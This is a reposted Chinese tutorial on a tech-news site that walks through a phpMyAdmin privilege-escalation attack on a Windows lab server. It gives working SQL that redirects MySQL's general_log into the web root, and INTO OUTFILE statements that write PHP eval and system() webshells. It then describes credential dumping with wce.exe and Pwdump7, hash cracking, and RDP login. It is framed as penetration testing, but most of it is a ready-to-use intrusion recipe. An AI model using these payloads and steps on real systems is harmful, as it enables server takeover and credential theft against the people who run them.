广告
返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >phpMyadmin提权的示例
  • 879
分享到

phpMyadmin提权的示例

2024-04-02 19:04:59 879人浏览 薄情痞子
摘要

小编给大家分享一下PHPMyadmin提权的示例,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!引言:在渗透测试过程中获知到php

小编给大家分享一下PHPMyadmin提权的示例,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!

引言:在渗透测试过程中获知到phpMyadmin的账号密码,如何进行提权呢?往下看,我今天和你说说phpMyadmin提权那些事。

0×00 定义

phpMyAdmin 是一个以PHP为基础,以WEB-Base方式架构在网站主机上的Mysql数据库管理工具,让管理者可用Web接口管理mysql数据库

0×01 环境准备

目标: windows Server 2003 Enterprise x64 Edition    192.168.17.137攻击机: window7 192.168.17.132Php:5.45Mysql: 5.5.53Apache: 2.4

0×02  开始渗透

我们经过弱口令,爆破,目录泄露等途径已经获知PhpMyadmin的账号密码是root  root。接下来我们就通过phpMyadmin来提权,尽可能贴近真实,多讲思路。

a 收集有用信息

phpMyadmin提权的示例phpMyadmin提权的示例

如上图所示,我们可以获取到以下有用信息。

  • 1.操作系统是windows server 2003 x86

  • 2.服务器是Apache 2.4.32

  • 3.网站默认路径是 E:\phpStudy\PHPTutorial\WWW

  • 4.PHP版本是 5.45

  • 5.mysql版本是 5.5.53

b  检测插入条件

在上面我们已经获知了网站默认的路径是E:\phpstudy\PHPTutorial\WWW,这个时候我们肯定想插入一句话后门文件或者是导出shell。那如果我们需要使用以上两种思路中的一种必须满足一个前提条件“secure_file_priv”对应的值不能为空且必须为默认网站的路径,所以我们必须提前检测一下“secure_file_priv”的值。

phpMyadmin执行以下命令:

SHOW VARIABLES LIKE “secure_file_priv”;

结果如图所示:

phpMyadmin提权的示例

从上图得知值为空,如果我们这时导入一句话,肯定会失败的,不信啊,那我们试试。

phpMyadmin提权的示例

报错The MySQL Server is running with the –secure-file-priv option so it cannot execute this statement,这是因为mysql对通过文件导入导出作了限制,默认不允许。默认value值为null,则为禁止,如果有文件夹目录,则只允许改目录下文件(测试子目录也不行)。我们思考一下看看能否设置其的路径为我们的默认网站路径,这样我们就可以导入一句话后门了。那我们试试吧。

phpMyadmin提权的示例

从图得知这个变量是一个只读变量无法动态更改,那应该是只能从配置文件中更改了。到这里发现陷入了一个胡同,那常规方式不行,我们可以去使用一些骚思路,利用log日志文件插入一句话。

c 转换思路

我们首先需要检测的是MySQL全局变量(general_log、general_log file)的值。

  1. general log 指的是日志保存状态,一共有两个值(ON/OFF)ON代表开启 OFF代表关闭。

  2. general log file 指的是日志的保存路径。

phpMyadmin提权的示例

从图得知general_log默认是关闭的,log日志存放的位置是E:\phpStudy\PHPTutorial\MySQL\data\。

首先我们来理解一下开启general_log 的作用,开启它可以记录用户输入的每条命令,会把其保存在E:\phpstudy\PHPTutorial\MySQL\data\下的一个log文件中,其实就是我们常说的日志文件。好,我们的利用的思路是开启general_log之后把general_log_file的值修改为我们网站默认路径下一个自定义的php文件中,然后我们通过log日志进行写入一句话后门到上面去,然后再进一步利用。

具体命令是:

set global general_log = "ON";SET global general_log_file='E:/phpStudy/PHPTutorial/WWW/infos.php';

phpMyadmin提权的示例

phpMyadmin提权的示例

紧接着我们可以看到在网站根路径下找到我们生成的伪日记文件infos.php。

phpMyadmin提权的示例

然后我们就得插入我们的一句话后门了。

select ‘<?php eval($_POST[yumu]);?>’;

phpMyadmin提权的示例

我们可以尝试使用菜刀连接,成功连接。

phpMyadmin提权的示例

d 获取管理员密码

0×00 直接获取明文

我们上传wce.exe获取明文密码。运气贼好,直接获取到明文(11位字母和数字混合的密码)。如果不能直接获取明文那就得走第二条获取hash值然后解密了。

phpMyadmin提权的示例

0×01 获取hash值

上传Pwdump7.exe获取hash值保存到passWord.txt文件中。获取hash值可以选择在线Http://www.objectif-securite.ch/en/ophcrack.php跑,跑不出来就用Ophcrack导入彩虹表跑吧。

phpMyadmin提权的示例

phpMyadmin提权的示例

e 查看3389是否开启

直接在菜刀终端输入“netstat -an | find “3389″ 或者“netstat -an ”。

phpMyadmin提权的示例

发现3389没开,但是3390就开了,我们尝试连接一下。

f  登陆服务器

运行mstsc开启远程桌面。

phpMyadmin提权的示例

phpMyadmin提权的示例

输入上面获取到的账号和密码,成功登陆。
phpMyadmin提权的示例

最后肯定是要清楚痕迹的,但我这里就不写了,写的内容也是贼多了

0×03 扩展

上面演示了secure_file_priv值为空的情况,那么如果secure_file_priv不为空那我们该怎么办?

a 配置my.ini文件(不对应网站根路径)

打开mysq的配置文件my.ini,对secure_file_priv的值进行设置,然后重启mysql。

secure_file_priv =  ”E:/phpStudy/PHPTutorial/MYSQL/”

phpMyadmin提权的示例

phpMyadmin提权的示例

尝试改变值,发现只是可读,不能写,那种情况无法写入我们的一句话,因为其限制了导出路径,无法把一句话写入之后导出到我们的网站根目录。

phpMyadmin提权的示例

phpMyadmin提权的示例


b 配置my.ini文件(对应网站根路径)

打开mysq的配置文件my.ini,对secure_file_priv的值进行设置,然后重启mysql。

secure_file_priv =  ”E:/phpStudy/PHPTutorial/WWW/”

phpMyadmin提权的示例

然后我们尝试插入一句话后门,成功插入。

phpMyadmin提权的示例

二话不说菜刀连接。

phpMyadmin提权的示例

phpMyadmin提权的示例

当然一句话还可以这样插入。

CREATE TABLE `mysql`.`infORMationes` (`inform` TEXT NOT NULL);INSERT INTO `mysql`.`informationes` (`inform`) VALUES ('<?php @eval($_POST[pass]);?>');SELECT `inform` from `mysql`.`informationes` into outfile 'e:/phpStudy/PHPTutorial/WWW/infos.php';DROP table if exists `mysql`.`informationes`;(注意: c:/phpStudy/PHPTutorial/WWW/为网站的绝对路径)
c 导出具有命令权限的Shell的php文件

select ‘<?php echo \’<pre>\’;system($_POST[\'yumu\']);echo \’</pre>\’;?>’ into outfile ‘c:/phpStudy/PHPTutorial/WWW/test.php’;

phpMyadmin提权的示例

phpMyadmin提权的示例

以上是“phpMyadmin提权的示例”这篇文章的所有内容,感谢各位的阅读!相信大家都有了一定的了解,希望分享的内容对大家有所帮助,如果还想学习更多知识,欢迎关注编程网PHP编程频道!

--结束END--

本文标题: phpMyadmin提权的示例

本文链接: https://www.lsjlt.com/news/54658.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • phpMyadmin提权的示例
    小编给大家分享一下phpMyadmin提权的示例,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!引言:在渗透测试过程中获知到php...
    99+
    2022-10-18
  • phpmyadmin的使用示例
    这篇文章主要介绍phpmyadmin的使用示例,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!一、创建数据库在 phpMyAdmin 的主界面中,可以看见有 “语言-languange...
    99+
    2022-10-18
  • 如何利用phpMyAdmin提权
    这篇文章主要介绍了如何利用phpMyAdmin提权,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。利用phpMyAdmin提权爆路径/phpm...
    99+
    2022-10-18
  • phpmyadmin通过日记提权的方法
    这篇文章主要介绍phpmyadmin通过日记提权的方法,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!phpmyadmin弱口令经常见到,今天我介绍下phpmyadmin如何提权。首先...
    99+
    2022-10-18
  • Phpmyadmin渗透测试的示例
    这篇文章给大家分享的是有关Phpmyadmin渗透测试的示例的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。首先通过目录扫描对某站进行扫描,发现存在phpmyadmin,尝试弱口令...
    99+
    2022-10-18
  • phpmyadmin提示mbstring怎么办
    小编给大家分享一下phpmyadmin提示mbstring怎么办,希望大家阅读完这篇文章之后都有所收获,下面让我们一起去探讨吧!phpmyadmin提示mbstring win系统:  打开c:\windows\php.ini&n...
    99+
    2023-06-13
  • MySQL show fileds from 提示无权限的示例分析
    MySQL show fileds from 提示无权限的示例分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。背景:MySQL-5.7....
    99+
    2022-10-18
  • ​phpmyadmin操作数据表的示例
    小编给大家分享一下phpmyadmin操作数据表的示例,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!phpmyadmin怎么操作...
    99+
    2022-10-18
  • PhpMyAdmin后台getshell的示例分析
    这篇文章主要介绍了PhpMyAdmin后台getshell的示例分析,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。PhpMyAdmin简介P...
    99+
    2022-10-18
  • phpmyadmin导入20m数据库的示例
    小编给大家分享一下phpmyadmin导入20m数据库的示例,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!phpmyadmin默...
    99+
    2022-10-18
  • phpmyadmin修改数据库名称的示例
    这篇文章将为大家详细讲解有关phpmyadmin修改数据库名称的示例,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。phpmyadmin修改数据库名称的方法:1、登录php...
    99+
    2022-10-18
  • 服务器安装配置phpmyadmin的示例
    小编给大家分享一下服务器安装配置phpmyadmin的示例,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!1、下载phpMyAdm...
    99+
    2022-10-18
  • PHPmyadmin漏洞以及拿shell的示例分析
    小编给大家分享一下PHPmyadmin漏洞以及拿shell的示例分析,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下面让我们一起去了解一下吧!phpmyad...
    99+
    2022-10-18
  • Linux+Apache+PHP+MySQL+Zend Optimizer+PHPMyAdmin的示例分析
    这篇文章主要介绍Linux+Apache+PHP+MySQL+Zend Optimizer+PHPMyAdmin的示例分析,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!一、前言发现本版中很多用户的问题都是关于空间搭建...
    99+
    2023-06-13
  • Linux中本地提权和EXP利用的示例分析
    这篇文章主要介绍Linux中本地提权和EXP利用的示例分析,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!Linux>=2.6.39 Mempodipper本地提权分析和EXP利用(CVE-2012-0056)&...
    99+
    2023-06-13
  • laravel5权限的示例分析
    这篇文章主要介绍laravel5权限的示例分析,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!角色权限管理是我们在laravel开发过程中必然会遇到的,问题是laravel自带的权限逻...
    99+
    2022-10-19
  • mysql中root用户无法授权及解决navicat远程授权提示1044的示例分析
    这篇文章主要为大家展示了“mysql中root用户无法授权及解决navicat远程授权提示1044的示例分析”,内容简而易懂,条理清晰,希望能够帮助大家解决疑惑,下面让小编带领大家一起研究并学习一下“mys...
    99+
    2022-10-18
  • phpmyadmin设置权限的方法
    这篇文章主要介绍了phpmyadmin设置权限的方法,具有一定借鉴价值,需要的朋友可以参考下。希望大家阅读完这篇文章后大有收获。下面让小编带着大家一起了解一下。phpmyadmin设置mysql数据库用户权...
    99+
    2022-10-18
  • phpmyadmin出现无法连接提示的解决方法
    小编给大家分享一下phpmyadmin出现无法连接提示的解决方法,希望大家阅读完这篇文章之后都有所收获,下面让我们一起去探讨吧!phpmyadmin出现无法连接提示的解决办法:首先找到【config.inc...
    99+
    2022-10-18
  • phpmyadmin提示令牌不符错误的解决方法
    这篇文章将为大家详细讲解有关phpmyadmin提示令牌不符错误的解决方法,小编觉得挺实用的,因此分享给大家做个参考,希望大家阅读完这篇文章后可以有所收获。首先打开phpmyadmin 目录下 librar...
    99+
    2022-10-18
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作